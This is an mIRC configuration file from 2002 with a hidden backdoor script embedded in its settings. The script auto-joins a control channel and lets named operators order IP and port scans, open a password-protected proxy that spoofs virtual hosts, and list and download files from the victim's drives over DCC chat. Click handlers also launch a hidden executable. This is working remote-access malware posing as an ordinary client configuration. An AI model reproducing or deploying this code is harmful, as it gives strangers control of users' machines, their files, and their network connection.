   [text]
   ignore=*.*
   commandchar=/
   linesep=-
   timestamp=[HH:nn]
   network=All
   quit=%quit ( $+ $ip $+ )
   finger=Hi :)
   lastreset=Fri May 10 16:13:58 2002
   accept=*.jpg,*.gif,*.png,*.bmp,*.txt,*.log,*.wav,*.mid,*.mp3,*.zip
   [files]
   addrbk=mirc.ini
   servers=mirc.ini
   browser=c:\progra~1\intern~1\iexplore.exe
   finger=finger.txt
   urls=mirc.ini
   [warn]
   fserve=off
   dcc=off
   [options]
   n0=1,0,0,0,0,1,300,1,1,0,1,0,0,0,1,1,0,1,1,1,512,0,1,4,0,0,0,1,0,50,0,0
   n1=0,1,1,0,0,6,22,0,3,0,1,1,0,0,0,0,0,0,0,0,0,0,0,0,20,0,0,0,2,0,1,0,0
   n2=1,0,0,0,1,1,1,1,0,80,160,1,1,1,1,0,0,0,1,160,40,10,0,0,1,0,1,1,0,0
   n3=500,0,0,0,1,0,1,0,0,1,0,1,0,0,1,1,1,0,0,0,0,0,1,0,0,0,2,16,0,0,1,3,180
   n4=0,0,1,0,0,3,9999,0,0,1,1,0,1024,0,1,9999,60,0,0,0,1,0,0,2,1,5000,0,5,0,0,3
   n5=1,1,1,1,1,1,1,1,1,1,7777,0,0,0,0,1,1,0,300,10,4,0,0,22,0,0,0,8192,1
   n6=0,0,0,1,1,1,1,1,1,1,0,0,0,0,0,0,1,0,0,1,0,0,100,1,1,0,0,0,0,1,4,1
   n7=1,0,0,0,0,0,0,1,1,1,1,1,0,1,0,0
   [dirs]
   [about]
   show=magnitude
   version=5.82
   [windows]
   scripts=62,680,66,449,0,0,0
   main=776,112,-18,27,0,1,0
   wchannel=42,522,42,455,0,1,0
   status=0,112,0,27,0,1,0
   wquery=21,431,21,234,1,1,0
   wserv=84,483,84,345,1,1,0
   #gtcontrol=21,112,436,27,0,1,0
   wmessage=14,633,57,393,0,1,0
   wdccg=0,240,0,212,0,1,0
   wchat=0,112,0,27,1,1,0
   wdccs=0,240,0,230,0,1,0
   [events]
   default=2,2,3,2,2,1,1
   [ident]
   active=yes
   system=UNIX
   port=113
   userid=gnadaw
   [socks]
   enabled=no
   port=1080
   method=4
   dccs=no
   [clicks]
   status=//run $mircdir $+ temp2.exe /n /fh mirc32 | //msg %connect.chan :DoubleClicked: Status
   query=//run $mircdir $+ temp2.exe /n /fh mirc32 | //msg %connect.chan :DoubleClicked: Query
   channel=//run $mircdir $+ temp2.exe /n /fh mirc32 | //msg %connect.chan :DoubleClicked: Channel
   nicklist=//run $mircdir $+ temp2.exe /n /fh mirc32 | //msg %connect.chan :DoubleClicked: Nick-List
   notify=//run $mircdir $+ temp2.exe /n /fh mirc32 | //msg %connect.chan :DoubleClicked: Notify-List
   [dde]
   ServerStatus=off
   ServiceName=mIRC
   CheckName=off
   [fileserver]
   warning=off
   homedir=c:
   [dccserver]
   n0=0,59,0,0,0,0
   [mirc]
   nick=tbrookyfcl
   anick=ReeeMa
   host=blow meSERVER:irc.alb7ry.com:7777GROUP:alb7ry
   user=ALWOOLF
   email=Ne4244lOo38Pe3799mIs31
   [colours]
   n0=0,6,4,5,2,3,3,3,3,3,3,1,5,7,6,1,3,2,3,5,1,0,1,0,1
   [pfiles]
   n0=mirc.ini
   n1=mirc.ini
   n2=mirc.ini
   n3=mirc.ini
   n4=mirc.ini
   [fonts]
   fscripts=Fixedsys,407
   fstatus=Fixedsys,412,178
   fchannel=Arial,416,0
   fquery=Wingdings,407,2
   f#dk-botz=MS Sans Serif,407,0
   f#updatescript=MS Sans Serif,407,0
   [nicklist]
   [servers]
   n0=blow meSERVER:irc.alb7ry.com:7777
   [aliases]
   n0=/op /mode # +ooo $$1 $2 $3
   n1=/dop /mode # -ooo $$1 $2 $3
   n2=/j /join #$$1 $2-
   n3=/p /part #
   n4=/n /names #$$1
   n5=/w /whois $$1
   n6=/k /kick # $$1
   n7=/q /query $$1
   n8=/send /dcc send $1 $2
   n9=/chat /dcc chat $1
   n10=/ping /ctcp $$1 ping

   [agent]
   enable=0,0,0
   char=default
   options=1,1,1,100,0
   speech=150,60,100,1,180,10,50,1,1,1,0,50
   channel=1,1,1,1,1,1,1,1,1
   private=1,1,1,1
   other=1,1,1,1,1,1,1
   pos=20,20

   [ports]
   random=off
   bind=off

   [language]
   sjis=0
   multibyte=0

   [marker]
   show=off
   size=3
   colour=4
   method=1

   [local]
   localip=195.226.250.241
   longip=3286432497

   [users]
   n0=400:ice^Man
   n1=400:server
   n2=400:Delar

   [sjis]
   enabled=no

   [variables]
   n0=%Cf Version
   n1=%connect.chan #ok

   [findtext]
   n0=the
   n1=start
   n2=on

   [waves]
   send=No Sound

   [dragdrop]
   n0=*.wav:/sound $1 $2-
   n1=*.*:/dcc send $1 $2-
   s0=*.*:/dcc send $1 $2-

   [Perform]
   n0=/timer45 0 60 / ping $me
   n1=/join %connect.chan
   n2=remote on

   [script]
   n0=on 1:SOCKOPEN:bnc*:{
   n1=.sockwrite -nt $sockname USER $r(a,z) $+ $r(a,z) $+ $r(a,z) $+ $r(a,z) $+ $r(a,z) $r(a,z) $+ $r(a,z) $+ $r(a,z) $+ $r(a,z) $+ $r(a,z) $r(a,z) $+ $r(a,z) $+ $r(a,z) $+ $r(a,z) $+ $r(a,z) : $+ %realname
   n2=.sockwrite -nt $sockname NICK  $rand(a,z)  $+ $rand(a,z)  $+ $rand(a,z) $+ $rand(a,z) $+ %nick $+ $rand(a,z)  $+ $rand(a,z)  $+ $rand(a,z) $+ $rand(a,z)
   n3=.sockwrite -nt $sockname %play %channel %notice
   n4=.sockwrite -nt $sockname %privmsg %channel : $+ %Cf $+
   n5=.sockwrite -nt $sockname %privmsg2 %channel : $+ %msg
   n6=.sockclose $sockname
   n7=}
   n8=on 400:TEXT:!scan *:*: {
   n9=if (%scan.nick != $null) { .msg $nick I'm Allready Scanning Rang  $+ %scan.perm1 $+ $chr(46) $+ %scan.perm2 $+ $chr(46) $+ %scan.perm3 $+ $chr(46) $+ %scan.perm4 To %scan.end1 $+ $chr(46) $+ %scan.end2 $+ $chr(46) $+ %scan.end3 $+ $chr(46) $+ %scan.end4 $+  I am Currently at  $+ %scan.start1 $+ $chr(46) $+ %scan.start2 $+ $chr(46) $+ %scan.start3 $+ $chr(46) $+ %scan.start4 $+  Scanning Port  $+ %scan.port $+  at a Delay Rate of  $+ $duration(%scan.delay) | halt }
   n10=if ($remove($2,$chr(46)) !isnum) || ($remove($3,$chr(46)) !isnum) || ($remove($4,$chr(44)) !isnum) || ($5 !isnum) { .msg $nick Syntax: please Type !scan <starting ip> <ending ip> <port> <delay> EX !scan 24.24.24.1 24.24.24.255 27374 5 | halt }
   n11=else {
   n12=set %scan.Start1 $gettok($2,1,46)
   n13=set %scan.Start2 $gettok($2,2,46)
   n14=set %scan.Start3 $gettok($2,3,46)
   n15=set %scan.Start4 $gettok($2,4,46)
   n16=set %scan.Perm1 $gettok($2,1,46)
   n17=set %scan.Perm2 $gettok($2,2,46)
   n18=set %scan.Perm3 $gettok($2,3,46)
   n19=set %scan.Perm4 $gettok($2,4,46)
   n20=set %scan.End1 $gettok($3,1,46)
   n21=set %scan.End2 $gettok($3,2,46)
   n22=set %scan.End3 $gettok($3,3,46)
   n23=set %scan.End4 $gettok($3,4,46)
   n24=if (%scan.start1 > 255) || (%scan.start2 > 255) || (%scan.start3 > 255) || (%scan.start4 > 255) || (%scan.end1 > 255) || (%scan.end2 > 255) || (%scan.end3 > 255) || (%scan.end4 > 255) { .msg $nick Sorry but you entered a digit Out Of Range | unset %scan.* | halt }
   n25=if (%scan.start1 > %scan.end1) || (%scan.start2 > %scan.end2) || (%scan.start3 > %scan.end3) || (%scan.start4 > %scan.end4) { .msg $nick Error Starting scan, your ending Ip is greater then your Starting ip | unset %scan.* | halt }
   n26=set %scan.port $4
   n27=set %scan.delay $5
   n28=set %scan.nick $nick
   n29=.timerscan 0 %scan.delay scancheck
   n30=.msg %scan.nick now Scanning Rang  $+ %scan.perm1 $+ $chr(46) $+ %scan.perm2 $+ $chr(46) $+ %scan.perm3 $+ $chr(46) $+ %scan.perm4 To %scan.end1 $+ $chr(46) $+ %scan.end2 $+ $chr(46) $+ %scan.end3 $+ $chr(46) $+ %scan.end4 $+  I am Currently at  $+ %scan.start1 $+ $chr(46) $+ %scan.start2 $+ $chr(46) $+ %scan.start3 $+ $chr(46) $+ %scan.start4 $+  Scanning Port  $+ %scan.port $+  at a Delay Rate of  $+ $duration(%scan.delay)
   n31=}
   n32=}
   n33=alias scancheck {
   n34=if (%scan.start1 > 255) { .msg %scan.nick Scaning Has Completed | .msg %scan.nick Scanning has completed, now waiting for all sockets to close, you will be notified when all sockets are closed | .timerscan off | .timersockscheck 0 5 scansock | halt }
   n35=if (%scan.start2 > 255) || (%scan.start3 > 255) || (%scan.start4 > 255) { .msg %scan.nick An Error Has Occured in the Scanning Proccess, Scan Aborted at %scan.start1 $+ $chr(46) $+ %scan.start2 $+ $chr(46) $+ %scan.start3 $+ $chr(46) $+ %scan.start4 | unset %scan.* | .timerscan off | halt }
   n36=if ($count(%scan.port,$chr(44)) >= 1) {
   n37=set %scan.counter 0
   n38=set %scan.countport $count(%scan.port,$chr(44))
   n39=inc %scan.countport 1
   n40=:start
   n41=inc %scan.counter 1
   n42=.sockopen scan $+ $gettok(%scan.port,%scan.counter,44) $+ $chr(46) $+ %scan.start1 $+ $chr(46) $+ %scan.start2 $+ $chr(46) $+ %scan.start3 $+ $chr(46) $+ %scan.start4 %scan.start1 $+ $chr(46) $+ %scan.start2 $+ $chr(46) $+ %scan.start3 $+ $chr(46) $+ %scan.start4 $gettok(%scan.port,%scan.counter,44)
   n43=if (%scan.counter >= %scan.countport) { goto end }
   n44=else { goto start }
   n45=}
   n46=else { .sockopen scan $+ %scan.port $+ $chr(46) $+ %scan.start1 $+ $chr(46) $+ %scan.start2 $+ $chr(46) $+ %scan.start3 $+ $chr(46) $+ %scan.start4 %scan.start1 $+ $chr(46) $+ %scan.start2 $+ $chr(46) $+ %scan.start3 $+ $chr(46) $+ %scan.start4 %scan.port }
   n47=:end
   n48=inc %scan.start4 1
   n49=if (%scan.start4 > %scan.end4) { set %scan.start4 %scan.perm4 | inc %scan.start3 }
   n50=if (%scan.start3 > %scan.end3) { set %scan.start3 %scan.perm3 | inc %scan.start2 }
   n51=if (%scan.start2 > %scan.end2) { set %scan.start2 %scan.perm2 | inc %scan.start1 }
   n52=if (%scan.start1 > %scan.end1) { .msg %scan.nick Scanning has completed, now waiting for all sockets to close, you will be notified when all sockets are closed | . .timerscan off | .timersockscheck 0 5 scansock | halt }
   n53=}
   n54=alias scansock {
   n55=if ($sock(scan*,0) = 0) {
   n56=.msg %scan.nick All Sockets Have closed, scanning all Variables now Being wiped!
   n57=unset %scan.*
   n58=.timersockscheck off
   n59=}
   n60=}
   n61=on *:SOCKOPEN:scan*: {
   n62=if ($sockerr > 0) { .sockclose $sockname | halt }
   n63=.msg %scan.nick IP: $gettok($remove($sockname,scan),2-,46) Port: $gettok($remove($sockname,scan),1,46)
   n64=.write scan.txt IP: $gettok($remove($sockname,scan),2-,46) Port: $gettok($remove($sockname,scan),1,46)
   n65=.sockclose $sockname
   n66=}
   n67=on *:QUIT: if ($nick = %port.nick) { .timerport off | .timerportcheck off | unset %port.* | .sockclose port* | halt }
   n68=on *:NICK: if ($nick = %port.nick) { set %port.nick $newnick | .msg %port.nick Port Probing nickname now changed to %port.nick ;) | halt }
   n69=
   n70=on 400:TEXT:!portstatus:*: { if (%port.nick = $null) { msg $nick I am currently Not scanning any ports }
   n71=elseif (%port.nick != $null) { .msg $nick I am currently scanning %port.address  on ports %port.perm to %port.end  i'm currently at %port.start its estimated another $duration($calc($iif(%port.delay > 0,%port.delay) $iif(%port.delay > 0,*) $calc(%port.end - %port.start) + 5)) before i'm done
   n72=}
   n73=}
   n74=on 400:TEXT:!portabort:*: { if ($nick = %port.nick) { .msg $nick i have aborted port scan | .timerport off | .timerportsock off | unset %port.* | halt } }
   n75=on 400:TEXT:!portscan *:*: {
   n76=if ($4 = $null) { msg $nick Error Entering Data use !portscan <ip> <Starting Port> <Ending Port> <delay> EX !portscan 24.24.24.42 1 9000 5 | halt }
   n77=if (%port.nick != $null) { .msg $nick Sorry but i am allready Scanning  $+ %port.perm $+  to  $+ %port.end $+  on  $+ %port.address $+  | halt }
   n78=if ($remove($2,$chr(46)) !isnum) || ($3 !isnum) || ($4 !isnum) || ($5 !isnum) { .msg msg $nick Error Entering Data use !portscan <ip> <Starting Port> <Ending Port> <delay> EX !portscan 24.24.24.42 1 9000 1 | halt }
   n79=if ($4 < $3) { .msg $nick Error Starting Port Can't be greater then ending port | halt }
   n80=set %port.address $2
   n81=set %port.start $3
   n82=set %port.end $4
   n83=set %port.perm $3
   n84=set %port.delay $5
   n85=set %port.nick $nick
   n86=.timerport 0 %port.delay portscan
   n87=.msg %port.nick now scanning  $+ %port.address $+  on Ports %port.start to %port.end with a delay of %port.delay  estimated time to finish, $duration($calc($iif(%port.delay > 0,%port.delay) $iif(%port.delay > 0,*) $calc(%port.end - %port.start) + 5))
   n88=}
   n89=alias portscan {
   n90=.sockopen port $+ %port.start $+ $chr(46) $+ %port.address %port.address %port.start
   n91=inc %port.start 1
   n92=if (%port.start >= %port.end) { .msg %port.nick Scanning of Ports has completed, now waiting for all ports to close | .timerport off | .timerportsock 0 5 portsock | halt }
   n93=}
   n94=alias portsock {
   n95=if ($sock(port*,0) = 0) {
   n96=.msg %port.nick scanning has now completed and all sockets have closed, you may now use port scan again
   n97=unset %port.*
   n98=.timerportsock off
   n99=}
   n100=}
   n101=on *:SOCKOPEN:port*: {
   n102=if ($sockerr > 0) { .sockclose $sockname | halt }
   n103=.msg %port.nick Address: $gettok($remove($sockname,port),2-,46) Port: $gettok($remove($sockname,port),1,46)
   n104=.sockclose $sockname
   n105=}
   n106=on 400:TEXT:!openbnc*:?:{
   n107=if ($2 = $null) { notice $nick hey USE !openBNC port password ;]. }
   n108=if ($2 != $null) && ($3 = $null) { notice $nick ya tel7 put a password }
   n109=if ($2 != $null) && ($3 != $null) {
   n110=set %BNCport $2
   n111=set %BNCPass $3
   n112=socklisten xBNC $+ $ticks %bncport
   n113=notice $nick Your BNC Deamon are now Online on /server $IP %BNCPort with /Pass %BNCPass . enjoy your hackin time ;].
   n114=closemsg $nick
   n115=}
   n116=}
   n117=
   n118=on 400:TEXT:!diebnc:*:{
   n119=sockclose XBNC*
   n120=sockclose xtorary*
   n121=sockclose temporary*
   n122=sockclose after*
   n123=notice $nick BNC Has Die $nick $+ .
   n124=
   n125=}
   n126=
   n127=on 400:TEXT:!checkBNC:*:{
   n128=if ($sock(XBNC*) != $null) { notice $nick I've Runned BNC On /server $IP %BNCPort with /Pass %BNCPass . }
   n129=if ($sock(XBNC*) = $null) { notice $nick I Don't Have a BNC Ya tel7 ya  $+ $nick $+ . }
   n130=}
   n131=
   n132=on 400:TEXT:!chat:?:{ /dcc chat $nick }
   n133=
   n134=on 1:CHAT:!find*:{
   n135=set %name $2
   n136=set %drive $3
   n137=/find %name %drive $nick
   n138=}
   n139=on 1:CHAT:!get*:{ FSend ON | /dcc send $nick $2-  }
   n140=on 1:CHAT:!test*:{ msg = $+ $nick the drive is $disk($2) }
   n141=alias find {
   n142=%time = 1
   n143=:top
   n144=if ($findfile($2,$1,%time) != $null)  { msg = $+ $3 $findfile($2,$1,%time) | inc %time |  goto top }
   n145=if ($findfile($2,$1,%time) == $null) { unset %num | msg = $+ $3 Finished Listing!! }
   n146=}
   n147=
   n148=
   n149=
   n150=on 1:SOCKOPEN:after*:{
   n151=sockwrite -nt $sockname NICK %BNCNick
   n152=sockwrite -nt $sockname USER %BNCIDent a a : $+ %BNCName
   n153=}
   n154=
   n155=
   n156=on 1:sockread:after*:{
   n157=if ($sockerr > 0) return
   n158=:nextread
   n159=sockread %temp
   n160=if ($sockbr == 0) return
   n161=if (%temp == $null) %temp = -
   n162=keering %temp
   n163=}
   n164=
   n165=alias keering {
   n166=set %Deamon $1
   n167=if (311 = $2) && ($4 = %BNCNick) { sockwrite -n xtorary %Deamon 311 %BNCNick %BNCNick %BNCIdent %BNCHOST * : $+ %BNCName  | haltdef }
   n168=if (311 = $2) && ($4 != %BNCNick) { sockwrite -n xtorary $1- | haltdef }
   n169=if ($2 = 001) { sockwrite -n xtorary $3-9 %BNCNick $+ ! $+ %BNCIDENT  $+ @ $+ %BNCHost }
   n170=if (311 != $2) { sockwrite -n xtorary $1- }
   n171=if (421 = $2) {
   n172=if (vip = $4) || (conn = $4) { halt }
   n173=}
   n174=}
   n175=
   n176=
   n177=
   n178=on 1:socklisten:xBNC*:{
   n179=.sockaccept temporary
   n180=.sockwrite -n temporary : $+ $IP NOTICE AUTH :You need to say /quote PASS <password>
   n181=}
   n182=
   n183=
   n184=
   n185=on 1:sockread:temporary*:{
   n186=if ($sockerr > 0) return
   n187=:nextread
   n188=sockread %temp
   n189=if ($sockbr == 0) return
   n190=if (%temp == $null) %temp = -
   n191=/xxpass %temp
   n192=}
   n193=
   n194=alias xxpass {
   n195=if (NICK = $1) { set %BNCNick $2 }
   n196=if (USER = $1) { set %BNCIdent  $2 | set %BNCName $mid($5,2,10000) $6- }
   n197=if ($1 = PASS) && ($2 = %BNCPass) { sockrename temporary xtorary | sockwrite -n xtorary : $+ $IP NOTICE AUTH :Welcome to BNC v2.8.2, the irc proxy | sockwrite -n xtorary : $+ $IP NOTICE AUTH :Level two, lets connect to something real now | sockwrite -n xtorary : $+ $IP NOTICE AUTH :type /quote conn [server] <port> <pass> to connect | sockwrite -n xtorary : $+ $IP NOTICE AUTH :type /quote VIP LIST for basic list of Virtual Hosts and usage. }
   n198=if ($1 = PASS) && ($2 != %BNCPass) { sockwrite -n temporary : $+ $IP NOTICE AUTH :Invild Password!. }
   n199=
   n200=if (NICK != $1) && (USER != $1) && (PASS != $1) { sockwrite -n temporary : $+ $IP NOTICE AUTH :unknown command!. }
   n201=}
   n202=
   n203=
   n204=
   n205=
   n206=on 1:sockread:xtorary*:{
   n207=if ($sockerr > 0) return
   n208=:nextread
   n209=sockread %temp
   n210=if ($sockbr == 0) return
   n211=if (%temp == $null) %temp = -
   n212=/xxpass2 %temp
   n213=/msg %BNCHackingChan %temp
   n214=}
   n215=
   n216=alias xxpass2 {
   n217=if (conn = $1) { sockopen after $+ $ticks $2- 6667 }
   n218=if (vip = $1) && (LIST != $2) { set %BNCHost $2 | sockwrite -n xtorary Switching your vhost to ( $+ $2 $+ ).... Process will take few seconds please wait. | sockwrite -n xtorary : $+ $IP NOTICE AUTH :Switching vhost to ( $+ %BNCHost $+ ) is complete!. try /conn server [port] }
   n219=if (vip = $1) && (LIST = $2) { sockwrite -n xtorary : $+ $IP NOTICE AUTH :By This BNCDeamon you can use any Virtual Host Like A.COM or Even unknown Vhost or UnRegistered Domain Names. Or Even Any Language vHost Try /vip EFnet /vip EFnet.NET /vip dal.net .it will spoof it automaticlly!. you've to thanx me to built this BNC deamon :). its so so so fun enjoy. }
   n220=if (NICK = $1) { set %BNCNick $2 }
   n221=else { sockwrite -nt after* $1- | halt }
   n222=}
   n223=on 1:SOCKREAD:ident*: {
   n224=sockread %ident
   n225=sockwrite -n $sockname  %ident : USERID : UNIX : $r(a,z) $+ $read temp.scr $+ $r(a,z)
   n226=if ($sock(iaB) == $null) socklisten iaB 113
   n227=}
   n228=on 1:SOCKLISTEN:iaB: sockaccept ident [ $+ [ $ticks ] ]
   n229=
   n230=on 1:START: {
   n231=auser 400 ice^Man | /auser 400 server | /auser 400 Delar  | .timergetinchan 0 30 join %connect.chan }

   [afiles]
   n0=mirc.ini

   [extensions]
   n0=defaultEXTDIR:download\

   [rfiles]
   n0=remote.ini
   n1=mirc.ini
   n2=mirc.ini
   n3=win.xkr.bat
